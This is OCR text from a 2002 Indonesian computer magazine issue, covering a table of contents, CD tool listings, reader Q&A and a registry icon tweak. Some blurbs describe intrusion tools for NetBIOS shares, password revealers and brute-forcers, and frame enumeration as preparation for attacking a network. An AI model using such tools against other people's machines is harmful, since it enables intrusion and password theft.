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SnadBoy’s Revelation

upa password lagi? Tapi password itu
masih ada dan tampil sebagai deretan
asterisk saja. Jangan khawatir. Kini ada

SnadBoy’s Revelation yang akan mengungkapkan
kembali password anda.

Caranya pun sangat mudah. Instal SnadBoy’s
Revelation dari CD NeoTek bulan ini atau
download dari situs aslinya di:

http://www.snadboy.com/

lalu jalankan sang pengungkap password ini.

Lihat kursor lingkaran+ (circled+ cursor) yang
tampak seperti alat bantu membidik itu? Nah
kursor istimewa ini dapat anda geret saja dan
tempatkan di atas tanpa ******* itu dan voila!
Apa yang ada di balik ******* itu pun
diungkapkan oleh SnadBoy!

Nah!

Mau main rahasia-rahasia
apa lagi sekarang?

LL

Windows 9x mempunyai fasilitas
untuk mengingat password yang

disimpan dalam file dengan ekstensi
.pwl. Efek buruknya, kita sering lupa

akan password kita sendiri.
Untuk itulah sebenarnya fungsi

SnadBoy’s revelation. Sama juga
dengan fungsi pwlviw yang dapat

anda peroleh pada CD NeoTek bulan
ini juga atau download dari:

http://lastbit.com/vitas/pwlview.asp
Fungsi pwlview sama dengan

SnadBoy’s Revaltion, namun dengan
tampilan command line, tampak

kurang ‘heboh’ dibandingkan
SnadBoy’s Revelation.

Intip PIntip Password!assword!
(lagi)(lagi)
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Pendamping Berselancar Salam!Salam!

numerasi anda perlukan sebelum anda, sebagai
seorang ‘hacker,’ melancarkan serangan ke jaringan
komputer sasaran anda. Dan untuk mengumpulkan

informasi lewat enumerasi itu anda membutuhkan perangkat
utilitas. NeoTek, lewat CD NeoTek, bukan hanya memberikan
perangkat tersebut, tetapi juga menyajikan cara penggunaan-
nya. Jadi, silakan simak cara menjalani langkah ketiga dalam
upaya hacking, setelah foot printing dan scanning, lewat sajian
NeoTek kali ini.

Redaksi
rreeddaakkssii@@nneeootteekk..ccoo..iidd

Menggali informasi lewatMenggali informasi lewat
enumerasi sebelumenumerasi sebelum

serangan dimulai.serangan dimulai.

EE

• Legion dapat menembus jaringan komputer yang tidak diproteksi lewat IP Address
dan membuat hard disk komputer sasaran sebagai hard disk pengguna Legion.
Penyerang dapat memperlakukan file di hard disk sasaran sebagai filenya sendiri.

NeoTek menyediakan CD
yang berisi program-
program yang dibahas
pada NeoTek nomor ini:

• Legion 2.1
• SMBScanner
• SolarWinds
• Snmputil
• OpenUSS 1.2 Final
• SDK 1.3.1.02 Windows
• Banner Maker Pro
• Coffee View 2.5
• Blitz 2D
• Ulead GIF Animator
• Pwlview
• ICQ Password Recovery

Dapatkan CD-ROM-nya
dalam satu paket dengan
majalah NeoTek:

Majalah + CD Rp19.500
CD saja Rp15.000

Hubungi
Bagian Sirkulasi
Majalah NeoTek
Tel.   (021) 548 1457
Faks. (021) 532 9041

email:
pemasaran@neotek.co.id
Kontak: Elvi R. Nainggolan

www.neotek.co.id

Bagaimana menghubungi NNEEOOTEK?TEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id

SURAT PEMBACA
support@neotek.co.id

WEBMASTER
webmaster@neotek.co.id

PEMASARAN
pemasaran@neotek.co.id

CHATROOM DI DALNET
#neoteker

ADMINISTRASI IKLAN
Tel. 021-5481457 Fax. 021-5329041

SIRKULASI NEOTEK
Tel. 021-3854764

ALAMAT REDAKSI
Gedung Cahaya Palmerah Suite 506
Jl. Palmerah Utara III No. 9
Jakarta 11480

MILIS PARA NEOTEKER
http://groups.yahoo.com/group/majalahneotek

PENAWARAN KHUSUS
Dapatkan koleksi 8 CD NeoTek

- CD NEOTEK 2-1
- CD NEOTEK 2-2
- CD NEOTEK 2-3
- CD NEOTEK 2-4
- CD NEOTEK 2-5
- CD NEOTEK 2-6
- CD NEOTEK 2-7
- CD NEOTEK 2-8

Dengan harga Rp95.000,-
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Daftar Isi

Daftar IsiDaftar Isi
NeoStartNeoStart

NeoTNeoTek Vek Vol. Iol. I I No. 1I No. 100
NeoStyleNeoStyle

Arsip Milis NeoTek
Apa saja yang sudah dibahas
di milis? Gunakan Search!

7 Mengganti Shutdwon
dan Log Off
Tip untuk mengganti nama

kedua menu di atas pada menu Start
dengan utilitas WinHex, sebuah Hex
Editor yang cukup andal.

44
Mengganti Ikon dll
Sulit mengganti ikon folder
khusus? Ikuti tip-nya untuk

memperoleh tampilan berbeda.

8

Nguping di IRC
Menyadap pembicaraan yang
berlangsung di ruang ngobrol

(chat room) IRC dapat dilakukan
dengan mengirimkan skrip buatan
anda ke teman ngobrol yang anda
ingin ketahui isi chat-nya.

12

Forum ala Milis
ASP memungkinkan anda
membuat forum ala milis di

halaman Web anda sehingga fasilitas di
situs anda bertambah lengkap.

16

Operator JavaScript
Bagian ketiga dari tutorial
JavaScript membahas operator

pada JavaScript.

21

psyBNC untuk Chat
Untuk melindungi diri anda saat
chat dari serangan tertentu,

anda dapat menggunakan psyBNC.

10
Membuat Banner
dengan Banner Maker
Membuat banner dengan

Banner Maker Pro2 menjadi pekerjaan
yang mudah dan menyenangkan.

OpenSource & Java
Peran piranti lunak Open
Source dalam pemebalajaran

bahasa pemrograman Java.

46

23

Membuat Game
Buat game sendiri dengan
menggunakan program Blitz

Basic. Caranya mudah tanpa
pemrograman ruwet.

Situs NeoTek www.neotek.co.id
neotek.kpone.com.sg

Jadikan situs NeoTek sebagai pangkalan Anda berselancar

Link Langsung
Kunjungi situs-situs yang dibahas di
majalah NeoTek dengan sekali klik
lewat situs NeoTek.

NeoTek versi PDF
Kehabisan NeoTek di kota Anda?
Dapatkan saja versi PDF-nya. Gratis!

Download
Tersedia juga download di situs
NeoTek selain dari situs aslinya

Layanan Rupa-rupa NeoTek
Dapatkan perlengkapan awal dalam
berinternet dari situs web NeoTek
HumanClick
Hotline langsung ke redaksi NeoTek
untuk menyampaikan saran dan pesan.
Chat Room
Kini tidak usah jauh-jauh untuk ngobrol
langsung dengan sesama NeoTeker
Mailing List
Ini yang paling ramai. Segera ikutan
berbagi pengalaman berinternet!

NeoEduNeoEdu

NeoGameNeoGame
48

NeoTNeoTutorutor



Melacak Port Number
Lacak port number secara remote
dengan menggunakan Ultra-

Scan. Gunakan juga tabel port number
yang jumlahnya mencapai 65.535.

41

Menyusup dengan
Legion
File sharing pada Windows

(fasilitas NetBIOS) banyak dimanfaatkan
orang untuk menyusup masuk komputer
orang lain. Salah satu utilitas yang dapat
digunakan untuk menyusup adalah
program utilitas Legion.

34

Poledit si Pelindung
Penyelusupan ke komputer
anda dapat ditangkis dengan

menggunakan dengan utilitas bernama
Policy Editor (Poledit).

36

Sebelum Menyerang
Dalam hacking, sebelum menye-
rang anda perlu mengumpulkan
informasi lewat enumerasi.

26

Daftar Isi

NeoSoft

RealProfil

NeoTek Agustus 2002

Intrusion Detection System
Cara mendeteksi serangan yang
terhadap suatu jaringan kerja dengan
menggunakan Snort.

Terminal Diskless
Berdayakan komputer-komputer tua
anda agar secanggih kemampuan
server-nya.

Cara Membuat Virus
Jangan hanya menerima serangan
virus. Pelajari cara membuat virus
(dan juga worm) agar anda dapat
menjaga diri, tentunya!

Snadboy’s Revelation0

Kru NeoTek
Bermarkas di
Gedung Cahaya Palmerah 503
Jl. Palmerah Utara III No. 9
Jakarta 11480
Telp. 021-5481457
Fax. 021-5329041

Bank
Bank BNI
a.n. PT NeoTek Maju Mandiri
No. rekening 070.001709720.001

Bank BCA KCP Rawamangun
a.n. Aswan Bakri
No. rekening 0940544131

Pemimpin Umum
Fachri Said

Pemimpin Redaksi
Kosasih Iskandarsjah

Redaktur Ahli
Onno W. Purbo
Michael S. Sunggiardi

Pemimpin Usaha
Fahmi Oemar
Ridwan Fachri

Redaktur Pelaksana
Gianto Widianto
Dadi Pakar

Sekretaris Redaksi
Elvy Risma Nainggolan

Dewan Redaksi
David Sugianto
Stanley

Webmaster
Supriyanto

Pemasaran
Hedhi Sabaruddin
Tuti Sundari

Iklan dan Promosi
Stanley
Elvy Risma Nainggolan

Keuangan
Aswan Bakri
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Mengendus password
pada komputer yang
tadinya tampil hanya
sebagai untai ****.

NmN
Neoteker menjawab Neoteker
dalam forum milis NeoTek

Ada Apa di CD NeoTek?
Eumeration Tools
Password Eavesdropping
SNMP Utilities

Daftar Isi CD NeoTek
PWL View
Program Dasar

NeoRagam

Inbox
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FOKUS BULAN INIFOKUS BULAN INI

Mematangkan Serangan
dengan Enumerasi

Mematangkan Serangan
dengan Enumerasi

NeoTNeoTeknoekno

 Isi hard disk komputer yang berhasil ditembus alias diintip secara remote dengan
menggunakan utilitas Legion v2.1



4 NeoTek Juli 2002

NeoRagam

AdaAda ApaApa didi CCDD NeoTNeoTek?ek?
Enumeration tools disajikan pada CD kali ini untuk melengkapi topik
utama pada nomor ini. Tak kalahj menariknya adalah PsyBNC yang
membuat kegiatan chatting anda lebih canggih.

CCDD  NNeeooTTeekk
JJuullii  22000022

numerasi men-
dapat perhatian
khusus sebagai

bahasan pada NeoTek
nomor ini. Isi CD NeoTek
pun mencerminkan bahas-
an utama kami. Pada
golongan Enumeration
Tools, anda dapat men-
jumpai sejumlah alat ban-
tu untuk enumerasi yang
biasa digunakan para
hacker untuk mengum-
pulkan informasi yang
memadai sebelum me-
mulai serangan ke jaring-
an kerja komputer yang
menjadi sasarannya. Pro-
gram bantu itu misalnya
Legion, SMB Scanner,
Snmputil, SolarWinds,
serta masih banyak lagi.

Bahasan tentang tweaking
ternyata mendapat reaksi
positif dari para pembaca.
Kami kembali menyerta-
kan cara mengubah Shut
Down dan Log Off pada
menu Start dan tidak lupa
menyertakan WinHex
sebagai Hex Editor untuk
tujuan ini.

Beberapa program yang
semakin lazim digunakan
oleh pemakai komputer
seperti DivX codec dan
DirectX juga kembali
ditampilan. Silakan
mencobanya!

EE

assword merupakan
piranti security yang

paling luas penggunaannya.
Sayang banyak yang
kurang berhari-hati
mengelola password. Pelba-
gai tools pengintai password
disajikan untuk meningkat-
kan kewaspadaan anda.

uSnadboy’s Revelation
Password hanya tampak da-
lam bentuk *******? Guna-
kan Snadboy’s Revelation un-
tuk mengungkapkannya.

uPwlview
Windows menyediakan fasi-
litas untuk menyimpan pass-
word.Tahukah anda bahwa
file ini mudah dibaca?

uPwlhack
Utilitas command line untuk
semua versi Windows. Men-
dukung brute force dan dict-
ionary attack.

uICQ Password Recovery
uICQr Information
Men-decrypt user name dan
password dari file .DAT milik
ICQ user.

uxIntruder
Memanfaatkan SMB vulner-
ability untuk mendapatkan
password dari suatu share,baik
pada LAN maupun melalui
Internet.

uCain 1.0
Password recovery tool ‘ter-
baik’untuk Windows 9x.

PPAASSSWSWOORRD D EEAAVVEESSDDRROOPPPPIINNGG
PP

u’NT Hacking Kit’
NT Resource Kit yang diju-
luki hacking kit. Tersedia
utilitas populer untuk
NT3.1, 3.5, 3.51, dan 4.0

uNbtscan 1.0.3
Mengotomatisasi perintah
nbtstat yang powerful un-
tuk multiple IP Address.

uLegion v.2.1
NetBIOS scanning tool yang
cepat dan dilengkapi brute
force tool untuk mendapatkan
akses remote resource share
Windows maupun Samba.

uSharesFinder
Versi lain dari NetBIOS
scanning tool. Cukup canggih
walau kinerjanya tidak sece-
pat Legion.

uNetBIOS Auditing Tool
NetBIOS scanner yang ber-
jalan pada Windows NT atau
Linux. Juga dengan fasilitas
brute force

uSMBScanner
NetBIOS scanner yang bu-
kan saja menampilkan folder
atau disk, melainkan juga
SMB share lain seperti remote
printer yang dapat anda akses
dari jauh.

uDumpSec (DumpAcl)
Salah satu share enumera-
tion terbaik untuk Windows
NT. Hanya berjalan pada
Windows NT.

uEpdump
Melacak RPC (Remote Pro-
cedure Call) endpoint mapper
dan menunjukkan servis
yang terkait pada IP Address
dan port number-nya.

uNetviewx
Serupa dengan epdump dan
sering digunakan dalam RAS
(Remote Access).

uWinfo
Mengekstrak user account,
shares, interdomain, server,
dan workstation trust account.

uNbtdump
Melaksanakan null-session,
enumerasi share dan user
account, serta melaporkan-
nya dalam format HTML.

uGetMAC
Menampilkan identitas
(MAC Address) dan device
name dari interface card
pada suatu remote machine.

EENNUUMMEERRAATTIIOON TN TOOOOLLSS

SNMP Utilities
usnmputil
Tool command line enumer-
asi SNMP (Simple Network
Management Protocol)

uSolarWinds
Tool scanning lengkap yang
di antaranya menyediakan
fasilitas SNMP browser dan
MIB scanning.

uSideStep
Vulnerability scanner yang
juga menyediakan fasilitas
SNMP scanning. Dapat dija-
lankan dalam metode evade
(menghindari pelacakan IDS
(Intrusion Detection System).

uTHC Happy Browser
Cara mudah melacak service
apa saja yang disediakan
pada suatu situs web.



PWL View
asilitas pada Windows untuk ‘mengingat’ password
anda, khususnya pada dial-up networking, memang

nyaman. Anda tidak perlu mengingat-ingat lagi password
anda. Saking nyamannya anda akhirnya lupa apa
password anda sebelumnya.

Password itu sebenarnya tersimpan dalam suatu file
dengan ekstensi .pwl dan dapat anda dapatkan dengan
menggunakan fasilitas Find. Setelah diperoleh, maka anda
tinggal men-decrypt file ini untuk mendapatkan kembali
password anda.

Salah satu tool untuk mendapatkan kembali password
yang terlupakan ini adalah pwlview. Cara penggunaannya
pun sangat mudah. Begitu dijalankan, apabila memang
password anda tersimpan sebagai cache pada komputer,
maka dengan hanya menekan <Enter> maka password itu
akan ditampilkan kembali untuk anda.

Tool ini juga merupakan tool yang paling sering disalah-
gunakan untuk mengintip password orang.

Juni 2002 NeoTek 5
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daftar isi cd neotekdaftar isi cd neotek
SCRIPTING DAN SERVER
ASP Edit aspedit
JavaScript Editor 2.5 jse2em
JS Editor 2.0 jsedit160
Personal Web Server setup

OPEN UNIVERSITY SUPPORT SYSTEM
OpenUSS 1.2 Final openuss-dev-1-2-final
Business Objects Layer jonas-2-4-4
Presentation Layer enhydra3.1
JRE 1.3.1.02 Windows jre-1_3_1_02-win-i
SDK 1.3.1.02 Windows j2sdk-1_3_1_02-win
Java Plugin 1.1.3.005 plugin-1_1_3_005-win-i

mIRC SCRIPT DAN BOT
mIRC 5.91 mirc591t
mIRC 6.0 mirc60
mIRC 6.01 mirc601
PsyBNC 2.3 psyBNC2.3.tar.gz
Putty putty

ENUMERATION TOOL
NT 3.1 Resource Kit
NT 3.5 Resource Kit
NT 3.51 Resource Kit
NT 4.0 Resource Kit
Nbtscan 1.0.3 nbtscan1_0_3
Legion v.2.1 legion
NetBIOS Auditing Tool Win nat
NetBIOS Auditing Tool Linuxnat10.tar.gz
SharesFinder sharesfinder
SMBScanner smbscanner-eng
Snmputil snmputil
SolarWinds Engineering Ev. SolarWinds2001-EE-Eval
SolarWinds Pro. Eval. SolarWinds2001-PE-Eval
SolarWinds ProPlus Eval. SolarWinds2001-PP-Eval
SideStep sidestep
DumpSec NT dumpacl
Epdump epdump
GetMAC getmac_setup
Netviewx nvx005
Winfo winfo
Nbtdump nbtdump
Enum NT (Linux) enum.tar.gz
Netcat for NT nc11nt
NT Admin Toolset aintx
ScanMAC scanmac
THC Happy Browser thc-hb09
Visual MIB Browser EMIBrowser006
xSeat Vulnerability Scan xseat2.0
UltraScan UScan12
Policy Editor SetupPol

TWEAKING TOOL
WinHex 9.72 winhex
CaroX Io Tools CaroXIO
CaroX 2.0 CaroX20
CaroX 2000 Bharatayuda CaroXBrt

GAME AND GRAPHICS
Banner Maker Pro Trial bmpro4trial
Blitz 2D setup
Ulead GIF Animator Full setup
Ulead Photo Impact Trial install

PASSWORD EAVESDROPPING
SnadBoy’s Revelation RevelationV2
Pwlview pwlview
Pwlhack 3.2 pwl_h32.rar
Pwlhack 4.02 pwl_h402.rar
Pwlhack 4.10 pwl_h410.rar
ICQ Password Recovery icqpsw
ICQr Information icqrin15
xIntruder xintruder
Cain 1.0 Demo cain10b

FF

PROGRAM DASAR
Adobe Acrobat 5.05 rp505enu.exe
CoffeeCup Free Viewer Plus CoffeeView25.exe
Directx 8.1 (Win2000) DX81Nteng.exe
Directx 8.1 (Win9x/Me) DX81eng.exe
DivX 4.12 Codec DivX412Bundle.exe
Enzip 3.00 enzip.exe
FTP Explorer ftpx.zip
nVidia drivers Win9x_23.11.exe
nVidia drivers (XP) Win2K-XP_23.11.exe
Real Player 8.0 RP8_setup.exe
Shockwave Player Shockwave_Installer_Full.exe
Winamp 2.78 winamp278_full_exe
WinZip 8.1 winzip81.exe

Program DasarProgram Dasar

uCoffee Cup Viewer Plus
Image viewer yang mudah
digunakan.Versi terakhir
dilengkapi fungsi email,
ftp, dan zip sehingga anda
dapat memilih sekelompok
gambar dan mengirimkan-
nya kepada teman anda.

uDivX4
Codec film berformat
DivX serta pemutar file
multimedia yang andal.

unVidia Driver
Driver grafik untuk card
TNT, TNT2, dan GeForce
1, 2 dan 3. Dibuat untuk
FreeBSD.

uEnzip
Utilitas kompresi zip untuk
MS Windows. Dengan an-
tarmuka yang stylish, pro-
gram sederhana ini diran-
cang untuk dapat langsung
bekerja pada Windows Ex-
plorer.
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Inbox

Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.

NmNNmN
NeoTeker menjawab NeoTekerNeoTeker menjawab NeoTeker

Kirim SMS
T: Posted May 1

Mengirim SMS dari Inter-
net, menggunakan www.
mtnsms.com, penerima
tidak mendeteksi no. hp si
pengirim. tapi no. telp. situs
ybs yg terbaca.

Lalu, saya pertanyaan:
Situs mana selain
mtnsms.com, dimana
SMS yg diterima si
penerima juga tercatat no.
hp si pengirimnya.

 Situs mengirim SMS
dilengkapi dgn gambar
dan lagu

 Bagaimana mendownload,
gambar/image atau lagu,
yg bisadimasukkan ke hp
kita.

Hamdan
hamdan432@plasa.com

J: Posted May 1
coba di http://www.1rstwap.
com/partners/go.to/gsm-
club. Anda harus daftar dulu
(free.....)

IGO
ihiawatta@yahoo.com

J: Posted May 1
Buat tambahan bisa juga
pake www.sms.ac cepat juga
koq nyampeknya.

Sekarang lg nggak harus
daftar (walaupun daftarnya
free..) soalnya lagi perbaikan
(ktnya nambahin feature....).
Feature sebelumnya udah
lengkap koq. Cuma pengi-
riman dibatasi

wid
wiwid_230779@telkom.net

J: Posted May 2
Ada di www.1rstwap.com
dimana apapila kita mengi-
rim sms maka nomor kita
yang akan dilihat oleh

pengirim tanpa embel-embel
sangat mudah bisa juga
download gambar dan lagu
menyediakan freesms yang
dapat dikirimkan 50 kali
dalam 1 minggu

Budiyono
komp1e@yahoo.com

Linux Mandrake
T: Posted May 4
Saya ada beberapa pertanya-
an tentang Linux Mandrake:

1. Saya sekarang pake Win-
dows 98,kalo nginstal
Linuxnya (free 5.40 Gb)
langsung aja, setelah scan-
disk ama difrag. Lalu Win-
dows-nya kemana? Apa
tetap di hardisk saya, apa
hilang setelah nginstal
Linux (di tumpuk) ?

2. Gimana dgn software2 dan
programs2 lain yg dulu
saya install di Windows,
apa hilang setelah install
Linux Mandrake?

3. Apakah Linux Mandrake
ini yg ada di cd NeoTek
special linux mandrake
ORIGINAL? Kalo biasa-
nya saya instal window
kan ada kode ato ketik
kode registrasinya lao
linux mandrake gimana?

4. Siapa sih yg nyiptain
linux, kalo Windows kan
Microsoft ?

5. Apakah semua software
microsoft (windows) bisa
jalan di Linux Mandrake?

6. Bisa gak saya instal linux
mandrake-nya di hardisk
baru (kosong)? Gimana
caranya?

7. Untuk apa sih boot disket
(gunanya)? Terima kasih
atas jawabannya.

Andi Suryadi 
sonar_x4@yahoo.com

J: Posted May 4
1. Nanti sewaktu instalasi

Mandrake akan ada pilih-
an untuk resizing partisi
Windows yang ada. Mi-
salkan hard disk anda
mula-mula 10 Gbyte dan
yang masih free 5,5 Gbyte.
Maka dengan fasilitas di
Mandrake anda bisa ke-
cilkan jadi misalnya 7
Gbyte. Linux Mandrake
nanti akan diinstal di par-
tisi yang 3 Gbyte yang
anda sisihkan itu. Ada
baiknya data-data penting
di-back up (walaupun
biasanya aman2 saja).

2. Karena partisi Windows
tetap ada, semua yang ada
di partisi itu tetap utuh.

3. Tidak ada nomor registra-
si untuk instalasi Linux
Mandrake. Linux bersifat
open source dan free.

4. Linux digagas oleh Linus
Torvalds dari Finlandia dan
bekerja sama dengan Ri-
chard Stallman serta pro-
grammer seluruh dunia.

5. Software aplikasi pada
Linux berbeda dengan
Windows. Ada software
yang sama untuk kedua
sistem operasi itu, misal-
nya Netscape, ada juga
padanannya: Gimp setara
Photoshop, StarOffice
setara MS Office, FreeAmp
setara WinAmp, KDE
Media Player setara Win-
dows Media Player, dll.

Plug-in untuk browsing
yang lazim di Windows
seperti Quick Time,
Shockwave, dll baru dapat
berjalan pada Linux apa-
bila pada Linux terlebih
dulu di-install CrossOver
plug-in.
Software-software besar
pada Windows dapat ber-
jalan pada Windows

dengan sebelumnya me-
masang pada Linux emu-
lator Windows seperti
VMWare atau Wine.

6. Bisa dong. Waktu boot
lewat CD ROM Linux,
instalasi akan berjalan
dan anda akan mendapat-
kan hard disk anda seagai
/dev/hda1 yang masih
kosong (empty). Anda
tinggal alokasikan untuk
Mandrake.
Saya sekarang malah dari
hard disk kosong kadang-
kadang mengalokasikan
partisi untuk Windows.
Linux bisa mengenali
partisi Windows, tetapi
sebaliknya tidak bisa!

7. Kalau komputer anda
menggunakan mother-
board yang baru, maka
boot dapat lewat CD
ROM dan boot diskette
tak perlu dibuat. Bila
komputer anda tidak bisa
boot dar CD ROM
(walaupun ada CD ROM
drive-nya) maka harus
buat boot diskette. Anda
boot dar diskette dan baru
instal Linux-nya (tetap
ambil dari CD ROM)
file-file instalasinya.
Catatan: Pada NeoTek
edisi khusus Mandrake
ada salah cetak mengenai
cara membuat boot dis-
ket. Halaman 5 (langkah
3 yang kedua: Copy Bot
Image). Dikatakan cari
cdrom.img pada direktori
/images. Itu keliru harus-
nya cari file cdrom.img
pada direktori /boot.

Kosasih Iskandarsjah
kosasih_iskandarsjah@yahoo.com
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3 MEMASUKKAN KATA KUNCI
Pada kotak kosong yang disedia-
kan, masukkan kata kunci dari
informasi yang anda perlukan. Lalu
klik tombol ‘Search Archives.’ Pada
contoh ini kami mencari informasi
mengenai ‘psybnc.’

ernahkah anda suatu saat mengha-
dapi permasalahan tertentu dalam
ber-Internet atau berkomputer dan

memerlukan jawaban atas masalah itu?
Milis NeoTek bisa menjadi alternatif
sumber informasi yang cukup baik karena
milis ini kini telah mengarsip ribuan tanya
jawab, diskusi, dan informasi lain mengenai
Internet dan dunia teknologi informasi.

Untuk mencari informasi di milis ini anda
dapat menggunakan fasilitas Search yang
disediakan. Seperti halnya jika mengguna-
kan fasilitas yang sama pada Searh Engine,
anda cukup memasukkan kata kunci dari
informasi yang anda perlukan. Selanjutnya
Yahoo!-lah yang akan bekerja untuk anda.

BBIILLA MA MIILILIS TS TEELLAHAH
MMEENNJJADADI GI GUUDDANANG ARG ARSSIIPP......

Di milis NeoTek sebenarnya telah terjadi akumulasi
informasi yang jumlahnya mencapai ribuan. Dan itu semua
telah menjadi semacam arsip dengan subjek bahasan yang
suatu saat mungkin perlu anda cari kembali.

P

HASIL PENCARIAN
Setelah beberapa saat, hasil
pencarian muncul di layar. Dan
inilah hasil pencarian dengan kata
kunci ‘psybnc.’ Ditemukan 9 pesan
pada milis yang membahas atau
mengandung kata ‘psybnc.’
Pencarian dilakukan atas 7712 arsip
pesan yang tersimpan di milis.

PENGIRIM & TANGGAL PESAN
Di sisi kanan daftar pesan anda
dapat melihat siapa pengirim
pesan dan kapan pesan itu
dikirimkan. Fitur ini berguna
untuk mencek relevansi pesan
tersebut dengan keperluan anda
mencari informasi.

MASUK KE SITUS NEOTEK
Arahkan browser anda ke situs
NeoTek di www.neotek.co.id atau
neotek.kpone.com.sg. Lalu cari
dan klik link Mailing List di kolom
kiri halaman awal.

JUMLAH ARSIP MILIS
Setelah mengklik link Maliling List, anda
akan diantar ke layar link berikutnya
yang jika anda klik akan membawa
anda ke halaman milis NeoTek. Dan
inilah jumlah arsip yang telah
tersimpan di NeoTek sampai artikel ini
dibuat.

1

4 5

2

Mengais informasi di gudang arsip NeoTek

ISI PESAN
Jika anda klik salah satu link pada
arsip itu, maka akan pesan ber-
sangkutan pun akan ditayangkan di
layar. Dan anda dapat membaca
informasi yang terkandung di
dalamnya.

6
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rtikel ini mengajak
anda “bermain” de-
ngan folder khusus,

yaitu folder yang ditandai de-
ngan ikon khusus yang ber-
beda dengan yang lainnya.
Folder  ini contohnya adalah
My Computer, My Docu-
ments, Recycle Bin, Control
Panel, Printers, dll. Ada seba-
gian folder khusus tersebut
yang dapat diganti ikon dan
namanya dengan mudah,
yaitu dengan mengklik kanan
pada ikon tersebut. Tetapi
jumlahnya sedikit. Dengan
trik ini pembaca dapat me-
ngetahui bagaimana meng-
ganti gambar ikon, nama, dan

tooltip seluruh folder khusus
tersebut, termasuk yang tidak
dapat dilakukan dengan meng-
klik tombol kanan mouse.

Mengganti Ikon
Contoh yang akan digunakan
dalam hal ini adalah folder
My Computer. Untuk meng-
ganti ikon My Computer ini,
buka registry Windows de-
ngan menggunakan Regedit
dan bukalah key berikut:
HKEY_Current_User\software
\classes\clsid\{645FF040-5081
-101B-9F08-00AA002F954E}
\defaulticon
Bila key tersebut belum ada,
pembaca dapat membuat key

baru dengan
memilih
menu Edit →
New → Key.
Selanjutnya
pada string
value “de-
fault” yang
telah ada
isikan nama
direktori dan
ikon favorit
yang pem-
baca miliki.
Misal
C:\Myicon.ico. Dengan
demikian isi string value de-
fault adalah “C:\Myicon.ico.”
Selanjutnya coba jalankan

Windows Explorer dan anda
akan melihat ikon My Com-
puter yang telah berubah.
Mudah, kan.

FFolder Khususolder Khusus
Mengganti Ikon, Nama & TMengganti Ikon, Nama & Tooltipooltip

Pada Windows 9x, ada beberapa folder yang disebut folder khusus seperti My Computer, My Documents,
Recycle Bin. Folder-folder ini tidak mudah diutak-atik oleh pengguna karena fungsinya yang khusus. Happy

Chandraleka mengajak anda ‘bermain-main’ mengubah beberapa properti foloder ini.

A

Nama Ikon Key Registry String Value

My Computer hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon default
Network Neighborhood hkcu\software\classes\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D}\defaulticon default
Recycle bin default hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon default
Recycle bin full hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon full
Recycle bin empty hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E}\defaulticon empty
My Documents hkcu\software\classes\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103}\defaulticon default
Internet Explorer hkcu\software\classes\clsid\{871C5380-42A0-1069-A2EA-08002B30309D}\defaulticon default
Control Panel hkcu\software\classes\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D}\defaulticon default
Printers hkcu\software\classes\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D\defaulticon default
Dial-Up Networking hkcu\software\classes\clsid\{992CFFA0-F557-101A-88EC-00DD010CCC48}\defaulticon default
Web Folders hkcu\software\classes\clsid\{BDEADF00-C265-11D0-BCED-00A0C90AB50F}\defaulticon default
Scheduled Tasks hkcu\software\classes\clsid\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\defaulticon default

Tabel 1.  Tabel Key Registry untuk mengganti ikon folder khusus

Keterangan: hkcu = HKEY_Current_User

• Windows Explorer dengan icon dan nama baru untuk
folder khusus



NeoStart

Juli 2002 NeoTek 9

Ikon lain dapat diganti de-
ngan cara yang sama, hanya
saja anda perlu menyesuai-
kan nama ikon yang akan
diubah dengan key pada
registry Windows. Pembaca
dapat mengacu pada Tabel 1
di bawah.
Dengan mengacu pada Tabel 1
tersebut maka anda dapat
mengganti ikon pada folder
khusus yang semula tidak
mungkin diganti.

Mengganti Nama
Sama halnya dengan meng-
ganti ikon, mengganti nama
pada folder khusus pun ada
yang mudah yaitu dengan
mengklik kanan pada folder
tersebut Kemudian pilih me-
nu Rename. Tetapi pada seba-
gian ikon lain tidak dapat di-
lakukan dengan cara tersebut.
Artinya hanya dapat dilaku-
kan dengan cara di luar kebia-
saan yang ada, seperti yang
pernah penulis praktikkan.

Contoh merupakan hal yang
paling baik untuk menerang-
kan masalah ini. Dalam hal
ini penulis menggunakan
contoh folder Recycle Bin,

salah satu folder yang tidak
dapat diganti namanya dengan
menggunakan cara biasa yai-
tu dengan klik kanan pada
folder tersebut. Untuk meng-
ganti namanya, pembaca per-
lu menjalankan Regedit de-
ngan memilih menu Start →
Run. Dan pada kotak dialog
yang ditampilkan ketik “Reg-
edit”. Selanjutnya buka key
berikut:

Hkcu\software\
classes\clsid\{645FF040-5081-
101B-9F08-00AA002F954E}

Bila key tersebut belum ada,
anda perlu membuat key
baru dengan memilih menu
Edit → New → Key, dan beri
nama dengan nama key yang
belum ada. Langkah selanjut-
nya pada string value default
isikan nama yang baru untuk
Recycle Bin, misal “Tempat
Sampah”. Akhirnya buka
Windows Explorer dan nama
Recycle Bin telah berubah
menjadi Tempat Sampah.

Cara yang sama juga berlaku
untuk mengganti nama fol-
der khusus lainnya. Tentu sa-
ja pembaca perlu memperha-

tikan nama foldernya dengan
key registry yang ditunjuk-
kan pada Tabel 2.

Dengan menggunakan Tabel 2
di atas, pembaca dapat meng-
ganti nama folder khusus, cu-
kup dengan mengisikan string
value default berdasarkan ta-
bel tersebut. Folder yang tidak
dapat diganti namanya kini
dapat diganti.

Mengganti Tooltip
Yang dimaksud dengan tool-
tip adalah tulisan yang mun-
cul saat pointer mouse ber-
henti di atasnya.Tooltip biasa-
nya berisi deskripsi dari fol-
der bersangkutn atau tip ter-
tentu dan isinya ringkas, ti-
dak seperti isi file Help pada
suatu aplikasi. Berikut akan
dijelaskan cara mengganti
tooltip salah satu folder
khusus yaitu My Computer.

Anda perlu menjalankan
Regedit dan kemudian
membuka key berikut:

HKEY_Current_User\clsid\{
20D04FE0-3AEA-1069-
A2D8-08002B30309D}

Pada string value InfoTip

terdapat data berupa tulisan
